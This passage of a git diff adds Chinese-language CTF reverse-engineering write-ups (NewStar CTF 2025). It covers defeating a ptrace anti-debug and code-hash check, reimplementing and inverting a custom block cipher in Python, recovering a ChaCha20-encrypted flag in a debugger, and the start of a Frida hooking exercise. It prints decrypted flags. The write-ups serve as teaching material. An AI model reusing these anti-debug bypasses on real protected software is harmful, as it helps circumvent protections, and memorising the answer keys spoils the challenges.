BYTE1(*(_DWORD *)(4LL * (int)i + a1)); + *(_BYTE *)((int)(4 * i) + a2) = BYTE2(*(_DWORD *)(4LL * (int)i + a1)); + *(_BYTE *)((int)(4 * i) + 1LL + a2) = HIBYTE(*(_DWORD *)(4LL * (int)i + a1)); + } + return result; +} +``` + +除此之外,经过细心观察似乎还能发现,key的值貌似是会变化的,与函数上打入的断点密切相关,因此可以猜测这是某种反调试逻辑;另一方面,如果delta是随机值,则几乎大概率在其之前有一个 `srand(seed)` 来设置随机数种子,但我们查看所有的函数,发现并没有srand函数的引入,rand函数也不是粉色的库函数,我们查看rand的实现: + +```cpp +__int64 rand() +{ + dword_404060 ^= dword_404060 << 11; + dword_404060 ^= (unsigned int)dword_404060 >> 4; + dword_404060 ^= 32 * dword_404060; + dword_404060 ^= (unsigned int)dword_404060 >> 14; + return (unsigned int)dword_404060; +} +``` + +原来这个rand函数是一个自实现的随机函数,`dword_404060` 则是全局的随机数种子,我们查看其交叉引用(xref),发现除了rand之外,其还在一个叫 `start_routine` 的函数中被引用,查看这个函数: + +```cpp +void *__fastcall start_routine(void *a1) +{ + int i; // [rsp+1Ch] [rbp-14h] + + dword_404060 = sub_40128A(start, 4200941LL - (_QWORD)start); + sleep(1u); + for ( i = 0; i <= 3; ++i ) + dword_404070[i] ^= rand(); + return 0; +} +``` + +可以看到,`seed` 是将 `start` 函数开始的地址一直到某个偏移量(这里是程序 `.text` 段的结尾)位置的字节带入 `sub_40128A` 中生成的,且 `start_routine` 同时还修改了 `dword_404070`(也就是密钥)的值,查看 `sub_40128A`: + +```cpp +__int64 __fastcall sub_40128A(__int64 a1, unsigned __int64 a2) +{ + int v3; // [rsp+10h] [rbp-20h] + int v4; // [rsp+14h] [rbp-1Ch] + unsigned __int64 i; // [rsp+18h] [rbp-18h] + + v3 = 0; + v4 = 0; + for ( i = 0; i < a2; ++i ) + { + v3 += i * *(unsigned __int8 *)(a1 + i); + v4 ^= *(unsigned __int8 *)(a1 + i); + } + return v3 * (v4 ^ (unsigned int)ptrace(PTRACE_TRACEME, 0, 0, 0)); +} +``` + +这是一个自实现的简单校验函数,将程序的整个 `.text` 段的所有字节计算一个哈希,并加入了反调试逻辑。打入函数上的断点实际上改变了运行的程序在内存中的字节,因此如果断点的位置、数量等不同,每次生成的 `key` 值也会不同。 + +那么 `start_routine` 这个函数究竟是什么时候被调用的呢?动态调试可以发现其是在 `main` 之前被调用的。查看其 xref,有一个函数 `sub_401590` 调用了它: + +```cpp +unsigned __int64 sub_401590() +{ + pthread_t newthread; // [rsp+0h] [rbp-10h] BYREF + unsigned __int64 v2; // [rsp+8h] [rbp-8h] + + v2 = __readfsqword(0x28u); + pthread_create(&newthread, 0, start_routine, 0); + pthread_detach(newthread); + return v2 - __readfsqword(0x28u); +} +``` + +这个函数创建了一个线程,使其与 `main` 同时运行。`start_routine` 中的 `sleep(1)` 用于等待 `main` 中的 key 初始化赋值。`sub_401590` 的 xref 位于 `.init_array` 段;在 ELF 文件中,该段中的函数会先于 `main` 执行,因此这就是 key 被篡改的原因。 + +既然存在反调试和哈希校验,还能否拿到密钥? + +可以,这里有两种方法: + +方法 1:在哈希生成函数中的 `ptrace` 处下断点。由于 `ptrace` 是库函数,其调用位置在 `.plt.sec` 段,在 `.text` 段上方,不在哈希函数的处理范围内,因此可以在其上打断点: + +```asm +.plt.sec:00000000004010F0 +.plt.sec:00000000004010F0 ; =============== S U B R O U T I N E ======================================= +.plt.sec:00000000004010F0 +.plt.sec:00000000004010F0 ; Attributes: thunk +.plt.sec:00000000004010F0 +.plt.sec:00000000004010F0 ; __int64 ptrace(enum __ptrace_request request, ...) +.plt.sec:00000000004010F0 _ptrace proc near ; CODE XREF: sub_40128A+8B↓p +.plt.sec:00000000004010F0 endbr64 +.plt.sec:00000000004010F4 jmp cs:off_404020 ;在这里打断点 +.plt.sec:00000000004010F4 _ptrace endp +.plt.sec:00000000004010F4 +.plt.sec:00000000004010F4 ; --------------------------------------------------------------------------- +``` + +断在这里之后单步调试,或者直接运行到鼠标指针处(Run to cursor): + +```asm +.text:00000000004012F2 +.text:00000000004012F2 loc_4012F2: ; CODE XREF: sub_40128A+32↑j +.text:00000000004012F2 mov rax, [rbp+var_18] +.text:00000000004012F6 cmp rax, [rbp+var_30] +.text:00000000004012FA jb short loc_4012BE +.text:00000000004012FC mov ecx, 0 +.text:0000000000401301 mov edx, 0 +.text:0000000000401306 mov esi, 0 +.text:000000000040130B mov edi, 0 ; request +.text:0000000000401310 mov eax, 0 +.text:0000000000401315 call _ptrace ;这里是调用的地方 +.text:000000000040131A mov [rbp+var_8], rax ;断点之后可以运行到这里来 +.text:000000000040131E mov rax, [rbp+var_8] +.text:0000000000401322 xor eax, [rbp+var_1C] +.text:0000000000401325 imul eax, [rbp+var_20] +.text:0000000000401329 leave +.text:000000000040132A retn +.text:000000000040132A ; } // starts at 40128A +.text:000000000040132A sub_40128A endp +.text:000000000040132A +``` + +在这里观察 `rax` 寄存器,其值就是 `ptrace` 返回值,为 `0xFFFFFFFFFFFFFFFF`(-1)。将其改为 `0`,即可返回正确的哈希值。 + +方法 2:手动求哈希。使用十六进制编辑器或 IDA 直接 dump `.text` 段,再手动编写脚本求解哈希值。该方法较繁琐,且不容易确认结果正确性,更适合作为辅助验证手段。 + +### 实现加密解密 + +得到哈希后,就可以复现并逆向程序的加密逻辑。先对 byte 与 dword 互相转换的函数进行逆向: + +```python +def b2d(input_bytes): + output = [] + for i in range(0, len(input_bytes), 4): + b0 = input_bytes[i + 0] + b1 = input_bytes[i + 1] + b2 = input_bytes[i + 2] + b3 = input_bytes[i + 3] + value = (b3 << 0) | (b0 << 8) | (b2 << 16) | (b1 << 24) + output.append(value) + return output + +def re_d2b(input_bytes): + output = [] + for i in range(0, len(input_bytes), 4): + b0 = input_bytes[i + 0] + b1 = input_bytes[i + 1] + b2 = input_bytes[i + 2] + b3 = input_bytes[i + 3] + value = (b2 << 0) | (b3 << 8) | (b0 << 16) | (b1 << 24) + output.append(value) + return output + +def d2b(input_uint32_list): + output = bytearray() + for val in input_uint32_list: + byte0 = (val >> 0) & 0xFF + byte1 = (val >> 8) & 0xFF + byte2 = (val >> 16) & 0xFF + byte3 = (val >> 24) & 0xFF + output.append(byte2) + output.append(byte3) + output.append(byte0) + output.append(byte1) + return bytearray(output) + +def re_b2d(input_uint32_list): + output = bytearray() + for val in input_uint32_list: + byte3 = (val >> 0) & 0xFF + byte0 = (val >> 8) & 0xFF + byte2 = (val >> 16) & 0xFF + byte1 = (val >> 24) & 0xFF + output.append(byte0) + output.append(byte1) + output.append(byte2) + output.append(byte3) + return bytearray(output) +``` + +然后复现正向加密逻辑并编写逆向脚本(这里也包含手动求哈希的方法): + +```python +op = bytearray.fromhex("f30f1efa31ed4989d15e4889e24883e4f050544531c031c948c7c760174000ff15832e0000f4662e0f1f840000000000f30f1efac3662e0f1f84000000000090b850404000483d504040007413b8000000004885c07409bf50404000ffe06690c366662e0f1f8400000000000f1f4000be504040004881ee504040004889f048c1ee3f48c1f8034801c648d1fe7411b8000000004885c07407bf50404000ffe0c366662e0f1f8400000000000f1f4000f30f1efa803d652e0000007513554889e5e87affffffc605532e0000015dc390c366662e0f1f8400000000000f1f4000f30f1efaeb8af30f1efa554889e58b053c2e0000c1e00b89c28b05312e000031d08905292e00008b05232e0000c1e80489c28b05182e000031d08905102e00008b050a2e0000c1e00589c28b05ff2d000031d08905f72d00008b05f12d0000c1e80e89c28b05e62d000031d08905de2d00008b05d82d00005dc3f30f1efa554889e54883ec3048897dd8488975d0c745e000000000c745e400000000488b45d8488945f048c745e800000000eb34488b55f0488b45e84801d00fb6000fb6c0488b55e80fafc20145e0488b55f0488b45e84801d00fb6000fb6c03145e4488345e801488b45e8483b45d072c2b900000000ba00000000be00000000bf00000000b800000000e8d6fdffff488945f8488b45f83345e40faf45e0c9c3f30f1efa554889e548897de8488975e08955dcc745fc00000000e98e0000008b45fcc1e0024898488d5003488b45e84801d00fb6000fb6c08b55fcc1e2024863ca488b55e84801ca0fb6120fb6d2c1e20809c28b45fcc1e0024898488d4802488b45e84801c80fb6000fb6c0c1e01089d109c18b45fcc1e0024898488d5001488b45e84801d00fb6000fb6c0c1e01889c28b45fc4898488d348500000000488b45e04801f009ca89108345fc018b45dc8d500385c00f48c2c1f8023945fc0f8c5bffffff90905dc3f30f1efa554889e548897de8488975e08955dcc745fc00000000e9c40000008b45fc4898488d148500000000488b45e84801d08b088b45fcc1e0024898488d5002488b45e04801d089ca88108b45fc4898488d148500000000488b45e84801d08b00c1e80889c18b45fcc1e0024898488d5003488b45e04801d089ca88108b45fc4898488d148500000000488b45e84801d08b00c1e81089c18b45fcc1e0024863d0488b45e04801d089ca88108b45fc4898488d148500000000488b45e84801d08b00c1e81889c18b45fcc1e0024898488d5001488b45e04801d089ca88108345fc018b45fc3b45dc0f8c30ffffff90905dc3f30f1efa554889e54883ec3048897dd8488d0533fcffff488945f0488d05e5040000488d1521fcffff4829d0488945f8488b55f8488b45f04889d64889c7e861fdffff8905312b0000bf01000000e8e7fbffffc745ec00000000eb41b800000000e8cafcffff8b55ec4863d2488d0c9500000000488d150f2b00008b141131d089c18b45ec4898488d148500000000488d05f42a0000890c028345ec01837dec037eb9b800000000c9c3f30f1efa554889e54883ec1064488b042528000000488945f831c0488d45f0b900000000488d152bffffffbe000000004889c7e838fbffff488b45f04889c7e80cfbffff90488b45f864482b0425280000007405e8e7faffffc9c3f30f1efa554889e54883ec3048897dd8488975d0488b45d88b008945e8488b45d88b40048945ecc745f0efbeaddeb800000000e8f3fbffff8945f8c745fc72000000c745f400000000e9020100008b45f40faf45f80145f08b45f48d48014863c14869c06766666648c1e82089c2d1fa89c8c1f81f29c289d0c1e00201d029c189ca8b45ec89d1d3e089c2488b45d04883c0088b0031c28b45ec2b45f089d631c68b45f483c00483e0078b55ec89c1d3ea488b45d08b0031d031f00145e88b45f48d48024863c14869c0abaaaa2a48c1e8204889c289c8c1f81f29c289d001c001d001c029c189ca8b45e889d1d3e089c2488b45d04883c0048b0031c28b45e82b45f089d631c68b45f483c0034863d04869d29324499248c1ea2001c2c1fa0289c1c1f91f29ca89d1c1e10329d129c889c28b45e889d1d3e889c2488b45d04883c00c8b0031d031f00145ec8345f4018b45f43b45fc0f82f2feffff488b45d88b55e88910488b45d8488d50048b45ec890290c9c3f30f1efa554889e54881ecc000000064488b042528000000488945f831c0c78548ffffffffffffff83bd48ffffffff743281bd48ffffff0080ffff743981bd48ffffff0080ffff777b81bd48ffffff29723a97745a81bd48ffffff0080f9ff7438eb61c705a328000078563412c1a548ffffff0feb4ec70594280000efcdab908b9548ffffff89d001c001d0c1e00201d0898548ffffffeb2bc705752800001914451181b548ffffff29f2c368eb15c7056328000014018119818d48ffffff0ce1908d9081bd48ffffff2df3ba9f7405e953ffffff90488d05130800004889c7e86bf8ffff488d45c04889c6488d050f0800004889c7b800000000e8b0f8ffff488d45c04889c7e854f8ffff898554ffffff83bd54ffffff307419488d05e50700004889c7e826f8ffffb852bf0100e933010000488d8d60ffffff488d45c0ba300000004889ce4889c7e87cfaffffc7854cffffff00000000eb7a8b854cffffff48988b848560ffffff898558ffffff8b854cffffff83c00148988b848560ffffff89855cffffff488d8558ffffff488d157a2700004889d64889c7e8eafcffff8b9558ffffff8b854cffffff489889948560ffffff8b854cffffff83c0018b955cffffff489889948560ffffff83854cffffff0283bd4cffffff0b0f8e79ffffff488d4d90488d8560ffffffba0c0000004889ce4889c7e896faffffc78550ffffff00000000eb418b8550ffffff48980fb65405908b8550ffffff4898488d0d9b0600000fb6040838c27416488d05e10600004889c7e814f7ffffb852bf0100eb24838550ffffff0183bd50ffffff2f7eb6488d05c70600004889c7e8eef6ffffb8424b1d00488b55f864482b1425280000007405e8f5f6ffffc9c3000000f30f1efa4883ec084883c408c3") +hash_ttl = 0 +xor_ttl = 0 + +for i in range(len(op)): + hash_ttl += op[i] * i + xor_ttl ^= op[i] + +final_hash = (hash_ttl * xor_ttl) & 0xFFFFFFFF +print(hex(final_hash)) +stored_hash = final_hash + +def rand(): + global final_hash + final_hash = (final_hash ^ (final_hash << 11)) & 0xFFFFFFFF + final_hash = (final_hash ^ (final_hash >> 4)) & 0xFFFFFFFF + final_hash = (final_hash ^ (final_hash << 5)) & 0xFFFFFFFF + final_hash = (final_hash ^ (final_hash >> 14)) & 0xFFFFFFFF + return final_hash + +key = [0x12345678, 0x90ABCDEF, 0x11451419, 0x19810114] + +for i in range(4): + key[i] ^= rand() + print(hex(key[i]),end=" ") +print() + +inp = bytearray(b"123456781234567812345678123456781234567812345678") +msg = b2d(inp) +result = [] +for j in range(0,len(msg)//2): + m1 = msg[2*j] + m2 = msg[2*j+1] + ttl = 0xDEADBEEF + delta = rand() + rounds = 114 + # print(ttl) + # print(ttl, delta, rounds) + for i in range(rounds): + ttl = (ttl + i * delta) & 0xFFFFFFFF + m1 = (m1 + (((m2 << ((i + 1) % 5)) ^ key[2]) ^ (m2 - ttl) ^ ((m2 >> ((i + 4) % 8)) ^ key[0]))) & 0xFFFFFFFF + m2 = (m2 + (((m1 << ((i + 2) % 6)) ^ key[1]) ^ (m1 - ttl) ^ ((m1 >> ((i + 3) % 7)) ^ key[3]))) & 0xFFFFFFFF + result.append(m1) + result.append(m2) +enc = d2b(result) +print(enc.hex()) +``` + +确认输出与程序比较时的结果相同后即可解密。需要注意以下几点: + +1. 需要重新计算一次哈希值,确保使用的种子一致,并且要手动调用 4 次 `rand` 来模拟修改密钥时的 `rand` 行为。 + +2. 注意 `sum` 值的起始值,加的不是 `轮数 * delta`,因为每轮加的是 `i * delta` 而不是 `delta`。 + +3. 注意每组解密时轮数需要倒序,直接正向解密是错误的,因为 `sum` 每次变化的值与轮数有关。 + +解密脚本: + +```python +cipher = bytearray.fromhex("6eaab24614a47e60ba444ecc43aaaacdd4fc71aaf67d4b9be67def4e3d430bbf281485b2cf62a2c5ea7deb5ed6fc3cbf") +denc = re_d2b(cipher) +final_hash = stored_hash +# print(hex(final_hash)) +for i in range(4): + rand() +res = [] + +for j in range(0, len(denc)//2): + m1 = denc[2*j] + m2 = denc[2*j+1] + ttl_base = 0xDEADBEEF + delta = rand() + rounds = 114 + # print(ttl_base, delta, rounds) + ttl = (ttl_base + ((rounds-1) * rounds // 2) * delta) & 0xFFFFFFFF + # print(ttl) + for i in range(rounds - 1, -1, -1): + m2 = (m2 - (((m1 << ((i + 2) % 6)) ^ key[1]) ^ (m1 - ttl) ^ ((m1 >> ((i + 3) % 7)) ^ key[3]))) & 0xFFFFFFFF + m1 = (m1 - (((m2 << ((i + 1) % 5)) ^ key[2]) ^ (m2 - ttl) ^ ((m2 >> ((i + 4) % 8)) ^ key[0]))) & 0xFFFFFFFF + ttl = (ttl - i * delta) & 0xFFFFFFFF + # print(ttl) + res.append(m1) + res.append(m2) +dec = re_b2d(res) +print(dec) +# bytearray(b'FLAG{1_h4t3_h4sH_ch3cK1ng_4Nd_r4Nd0m_t3AenCRypt}') +``` + +FLAG: + +```plaintext +flag{1_h4t3_h4sH_ch3cK1ng_4Nd_r4Nd0m_t3AenCRypt} +``` diff --git a/docs/wp/2025/week4/reverse/ezrust.md b/docs/wp/2025/week4/reverse/ezrust.md new file mode 100644 index 0000000..001cdb8 --- /dev/null +++ b/docs/wp/2025/week4/reverse/ezrust.md @@ -0,0 +1,236 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# ezrust + +主要逻辑在 `sub_7FF718641DD0` 里面: + +```cpp +__int64 sub_7FF718641DD0() +{ + // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] + + v77 = -2; + si128_1.m128i_i64[0] = (__int64)&off_7FF71865B6A0;// "Enter your FLAG: " + si128_1.m128i_i64[1] = 1; + v70.m256i_i64[0] = 8; + *(_OWORD *)&v70.m256i_u64[1] = 0; + sub_7FF7186467D0(&si128_1); + expand_32_byte_kString_Theocracy[0].m128i_i64[0] = sub_7FF718645DA0(); + v0 = sub_7FF718645DE0(expand_32_byte_kString_Theocracy); + if ( v0 ) + { + si128_1.m128i_i64[0] = v0; + core::result::unwrap_failed( + (unsigned int)aCalledResultUn, + 43, + (unsigned int)&si128_1, + (unsigned int)&off_7FF71865B520, + (__int64)&off_7FF71865B6C0); // "src\\main.rs" + } + v66 = 0; + v67 = 1; + v68 = 0; + expand_32_byte_kString_Theocracy[0].m128i_i64[0] = sub_7FF718645BA0(); + if ( (sub_7FF718645BE0(expand_32_byte_kString_Theocracy, &v66) & 1) != 0 ) + { + si128_1.m128i_i64[0] = v1; + core::result::unwrap_failed( + (unsigned int)aCalledResultUn, + 43, + (unsigned int)&si128_1, + (unsigned int)&off_7FF71865B520, + (__int64)&off_7FF71865B6D8); // "src\\main.rs" + } + v2 = sub_7FF718642690(v67, v68); + if ( n40 != 40 ) + { + si128_1.m128i_i64[0] = (__int64)&off_7FF71865B730;// "Wrong FLAG! Try again!\n" + si128_1.m128i_i64[1] = 1; + v70.m256i_i64[0] = 8; + *(_OWORD *)&v70.m256i_u64[1] = 0; + result = sub_7FF7186467D0(&si128_1); + v23 = v66; + if ( !v66 ) + return result; + return sub_7FF718642920(v67, v23, 1); + } + v4 = v2; + nullsub_1(); + Buf1_1 = (__m128i *)j___rdl_alloc(40, 1); + if ( !Buf1_1 ) + sub_7FF71865A453(1, 40, &off_7FF71865B5D8); // "C:\\Users\\azusa\\.rustup\\toolchains\\stable-x86_64-pc-windows-msvc\\lib/rustlib/src/rust\\library\\alloc\\src\\slice.rs" + Buf1_1[2].m128i_i64[0] = *(_QWORD *)(v4 + 32); + v6 = *(__m128i *)v4; + Buf1_1[1] = _mm_loadu_si128((const __m128i *)(v4 + 16)); + Buf1 = Buf1_1; + *Buf1_1 = v6; + qmemcpy( + expand_32_byte_kString_Theocracy, + "expand 32-byte kString_Theocracy", + sizeof(expand_32_byte_kString_Theocracy)); + v65 = _mm_loadu_si128((const __m128i *)&xmmword_7FF71865B600); + v7 = off_7FF718665008; + if ( *off_7FF718665008 == -1 ) + sub_7FF718659890(); + si128 = _mm_load_si128(expand_32_byte_kString_Theocracy); + v9 = _mm_load_si128(&expand_32_byte_kString_Theocracy[1]); + *(__m128i *)&v70.m256i_u64[2] = _mm_load_si128(&v65); + *(__m128i *)v70.m256i_i8 = v9; + si128_1 = si128; + v71.m128i_i32[0] = 0; + qmemcpy((char *)v71.m128i_i64 + 4, "NewStar 2025", 12); + memset(v72, 0, sizeof(v72)); + v73 = 0; + v74 = 0; + expand_32_byte_kString_Theocracy[0].m128i_i64[0] = (__int64)Buf1; + expand_32_byte_kString_Theocracy[0].m128i_i64[1] = (__int64)Buf1; + expand_32_byte_kString_Theocracy[1].m128i_i64[0] = 0; + sub_7FF718641000(&si128_1, expand_32_byte_kString_Theocracy); + if ( *v7 == 1 ) + { + sub_7FF718641B30(&si128_1, v72); + v10 = _mm_load_si128(v72); + v11 = v72[0].m128i_i8[4]; + v12 = v72[0].m128i_i8[5]; + v13 = v72[0].m128i_i8[6]; + v14 = v72[0].m128i_i8[7]; + v15 = v72[0].m128i_i8[8]; + v16 = v72[0].m128i_i8[9]; + v17 = v72[0].m128i_u8[10]; + v18 = _mm_cvtsi32_si128(*(unsigned __int16 *)((char *)&v72[0].m128i_u16[5] + 1)); + v19 = _mm_cvtsi32_si128(*(unsigned __int16 *)((char *)&v72[0].m128i_u16[6] + 1)); + v20 = _mm_cvtsi32_si128(*(unsigned __int16 *)((char *)&v72[0].m128i_u16[7] + 1)); + Buf1_2 = (char *)Buf1; + } + else + { + v24 = _mm_load_si128(&si128_1); + v25 = _mm_load_si128((const __m128i *)&v70); + v26 = _mm_load_si128((const __m128i *)&v70.m256i_u64[2]); + v27 = _mm_load_si128(&v71); + n10 = 10; + v29 = v24; + v30 = v25; + v31 = v27; + v32 = v26; + Buf1_2 = (char *)Buf1; + do + { + v33 = _mm_add_epi32(v29, v30); + v34 = _mm_xor_si128(v31, v33); + v35 = _mm_or_si128(_mm_slli_epi32(v34, 0x10u), _mm_srli_epi32(v34, 0x10u)); + v36 = _mm_add_epi32(v32, v35); + v37 = _mm_xor_si128(v30, v36); + v38 = _mm_or_si128(_mm_slli_epi32(v37, 0xCu), _mm_srli_epi32(v37, 0x14u)); + v39 = _mm_add_epi32(v33, v38); + v40 = _mm_xor_si128(v35, v39); + v41 = _mm_or_si128(_mm_slli_epi32(v40, 8u), _mm_srli_epi32(v40, 0x18u)); + v42 = _mm_add_epi32(v36, v41); + v43 = _mm_xor_si128(v38, v42); + v44 = _mm_or_si128(_mm_slli_epi32(v43, 7u), _mm_srli_epi32(v43, 0x19u)); + v45 = _mm_add_epi32(_mm_shuffle_epi32(v39, 147), v44); + v46 = _mm_xor_si128(_mm_shuffle_epi32(v41, 78), v45); + v47 = _mm_or_si128(_mm_slli_epi32(v46, 0x10u), _mm_srli_epi32(v46, 0x10u)); + v48 = _mm_add_epi32(_mm_shuffle_epi32(v42, 57), v47); + v49 = _mm_xor_si128(v44, v48); + v50 = _mm_or_si128(_mm_slli_epi32(v49, 0xCu), _mm_srli_epi32(v49, 0x14u)); + v51 = _mm_add_epi32(v45, v50); + v52 = _mm_xor_si128(v47, v51); + v53 = _mm_or_si128(_mm_slli_epi32(v52, 8u), _mm_srli_epi32(v52, 0x18u)); + v54 = _mm_add_epi32(v48, v53); + v55 = _mm_xor_si128(v50, v54); + v30 = _mm_or_si128(_mm_slli_epi32(v55, 7u), _mm_srli_epi32(v55, 0x19u)); + v32 = _mm_shuffle_epi32(v54, 147); + v31 = _mm_shuffle_epi32(v53, 78); + v29 = _mm_shuffle_epi32(v51, 57); + --n10; + } + while ( n10 ); + v10 = _mm_add_epi32(v29, v24); + v72[0] = v10; + v72[1] = _mm_add_epi32(v30, v25); + v72[2] = _mm_add_epi32(v32, v26); + v73 = _mm_add_epi32(v31, v27); + v71.m128i_i32[0] = _mm_cvtsi128_si32(v27) + 1; + v75 = v10; + v11 = v10.m128i_i8[4]; + v12 = v10.m128i_i8[5]; + v13 = v10.m128i_i8[6]; + v14 = v10.m128i_i8[7]; + v15 = v10.m128i_i8[8]; + v16 = v10.m128i_i8[9]; + v17 = v10.m128i_u8[10]; + v56 = _mm_srli_si128(v10, 14); + v57 = _mm_shuffle_epi32(v10, 255); + v58 = _mm_shufflelo_epi16(_mm_unpacklo_epi8(_mm_unpacklo_epi8(v56, v72[1]), (__m128i)0LL), 230); + v20 = _mm_packus_epi16(v58, v58); + v59 = _mm_shufflelo_epi16(_mm_unpacklo_epi8(_mm_unpacklo_epi8(v57, v56), (__m128i)0LL), 230); + v19 = _mm_packus_epi16(v59, v59); + v60 = _mm_shufflelo_epi16(_mm_unpacklo_epi8(_mm_unpacklo_epi8(_mm_srli_si128(v10, 10), v57), (__m128i)0LL), 230); + v18 = _mm_packus_epi16(v60, v60); + } + *(_DWORD *)Buf1_2 = _mm_cvtsi128_si32(_mm_xor_si128(_mm_cvtsi32_si128(*(_DWORD *)Buf1_2), v10)); + Buf1_2[4] ^= v11; + Buf1_2[5] ^= v12; + Buf1_2[6] ^= v13; + Buf1_2[7] ^= v14; + Buf1_2[8] ^= v15; + Buf1_2[9] ^= v16; + v61 = _mm_load_si128((const __m128i *)&xmmword_7FF71865B4A0); + v62 = _mm_or_si128( + _mm_andnot_si128(v61, _mm_slli_epi64(v19, 0x18u)), + _mm_and_si128( + _mm_or_si128( + _mm_slli_epi32(v18, 8u), + _mm_andnot_si128(_mm_load_si128((const __m128i *)&xmmword_7FF71865B490), _mm_cvtsi32_si128(v17))), + v61)); + v63 = _mm_load_si128((const __m128i *)&xmmword_7FF71865B4B0); + *(__m128i *)(Buf1_2 + 10) = _mm_xor_si128( + _mm_unpacklo_epi64( + _mm_or_si128( + _mm_slli_epi64(_mm_cvtsi32_si128(v72[1].m128i_u8[1]), 0x38u), + _mm_and_si128( + _mm_or_si128( + _mm_andnot_si128(v63, _mm_slli_epi64(v20, 0x28u)), + _mm_and_si128(v62, v63)), + (__m128i)xmmword_7FF71865B4C0)), + _mm_loadl_epi64((const __m128i *)&v72[1].m128i_i16[1])), + _mm_loadu_si128((const __m128i *)(Buf1_2 + 10))); + *(_QWORD *)(Buf1_2 + 26) ^= *(unsigned __int64 *)((char *)&v72[1].m128i_u64[1] + 2); + *(_DWORD *)(Buf1_2 + 34) ^= *(unsigned __int32 *)((char *)v72[2].m128i_u32 + 2); + *((_WORD *)Buf1_2 + 19) ^= v72[2].m128i_u16[3]; + if ( !memcmp(Buf1_2, asc_7FF71865B6F0, 0x28u) ) + si128_1.m128i_i64[0] = (__int64)&off_7FF71865B770;// "Congratulations! You found the correct FLAG!\n" + else + si128_1.m128i_i64[0] = (__int64)&off_7FF71865B730;// "Wrong FLAG! Try again!\n" + si128_1.m128i_i64[1] = 1; + v70.m256i_i64[0] = 8; + *(_OWORD *)&v70.m256i_u64[1] = 0; + sub_7FF7186467D0(&si128_1); + result = sub_7FF718642920(Buf1, 40, 1); + v23 = v66; + if ( v66 ) + return sub_7FF718642920(v67, v23, 1); + return result; +} +``` + +观察到加密过程中含有 `expand 32-byte k` 这个字符串,可以先确定为是 ChaCha20 或者 Salsa20 加密,进一步分析后可以确定是 ChaCha20 加密。 + +针对 ChaCha20 这种流加密,可以使用动态调试:将输入 patch 为密文并重新执行加密流程,最后得到的结果即为 FLAG 明文。该方法成立的原因是流加密的加解密过程都使用同一段密钥流进行异或。 + +在 `memcmp` 处找到密文为 `A36258DB4B824FCE48DABE421CD8596BC7B2CA020B216B104D4E7BEBCE9FFB21E9CF6BC2C24CB34D`。 + +使用 IDA 动态调试,输入一串与密文长度相同的字符,例如 `1234567890......`。在内存窗口中找到输入位置,在地址开头右键选择 `Paste Data`,填入十六进制密文后点击 `Apply`。 + +> 这一步中你可能需要的插件:[P4nda0s/LazyIDA: Make your IDA Lazy!](https://github.com/P4nda0s/LazyIDA) + +![IDA 粘贴密文数据](/assets/images/wp/2025/week4/ezrust_1.png) + +![应用密文 Patch](/assets/images/wp/2025/week4/ezrust_2.png) + +之后运行到 `call memcmp` 处,查看原输入位置,即可得到 FLAG。 + +![调试得到 FLAG 明文](/assets/images/wp/2025/week4/ezrust_3.png) diff --git a/docs/wp/2025/week4/reverse/not-tui.md b/docs/wp/2025/week4/reverse/not-tui.md new file mode 100644 index 0000000..f0f87ae --- /dev/null +++ b/docs/wp/2025/week4/reverse/not-tui.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# NOT_TUI diff --git a/docs/wp/2025/week4/reverse/pleasehookme.md b/docs/wp/2025/week4/reverse/pleasehookme.md new file mode 100644 index 0000000..907f5e4 --- /dev/null +++ b/docs/wp/2025/week4/reverse/pleasehookme.md @@ -0,0 +1,234 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# PleaseHookMe + +## 分析 + +打开 `so` 搜索 `Java` ,因为编译器优化的关系,看起来代码有点恐怖。 +`veorq_s8` 和 `vqtbl1q_s8` 都是 `ARM64` 的 `Neon` 指令,用来生成密钥,可以看看 `ARM` 的手册,写循环来模拟这个算法。本题更推荐使用 `Frida` `HOOK` + +```cpp +bool __fastcall Java_work_pangbai_hookme_FirstFragment_check(__int64 *a1, __int64 a2, __int64 a3) +{ + __int64 v3; // x8 + const char *s; // x20 + size_t v5; // x0 + char *dest; // x19 + char *s_1; // x0 + _BOOL4 v8; // w20 + int v9; // w13 + unsigned int v10; // w14 + unsigned int mm; // w8 + unsigned int v12; // w10 + int8x16_t v13; // q2 + unsigned int v14; // w9 + unsigned int v15; // w11 + int v16; // w15 + bool v17; // cf + int v18; // w16 + int8x16_t v20; // [xsp+0h] [xbp-20h] BYREF + _BYTE v21[4]; // [xsp+14h] [xbp-Ch] BYREF + __int64 v22; // [xsp+18h] [xbp-8h] + + v22 = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2)) + 40); + v3 = *a1; + v21[0] = 0; + s = (const char *)(*(__int64 (__fastcall **)(__int64 *, __int64, _BYTE *))(v3 + 1352))(a1, a3, v21); + v5 = strlen(s); + dest = (char *)malloc(v5 + 1); + s_1 = strcpy(dest, s); + v8 = 0; + if ( strlen(s_1) == 16 ) + { + v9 = -214; + v10 = -1640531527; + mm = *(_DWORD *)dest; + v12 = *((_DWORD *)dest + 1); + v13 = veorq_s8((int8x16_t)l, (int8x16_t)t); + v15 = *((_DWORD *)dest + 2); + v14 = *((_DWORD *)dest + 3); + v20 = veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8( + veorq_s8( + vqtbl1q_s8((int8x16_t)xmmword_720, (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13), + (int8x16_t)t), + v13); + do + { + v16 = (v10 >> 2) & 3; + v17 = __CFADD__(v9++, 1); + mm += (((4 * v12) ^ (v14 >> 5)) + ((16 * v12) ^ (v14 >> 3))) ^ ((*(_DWORD *)((unsigned __int64)&v20 & 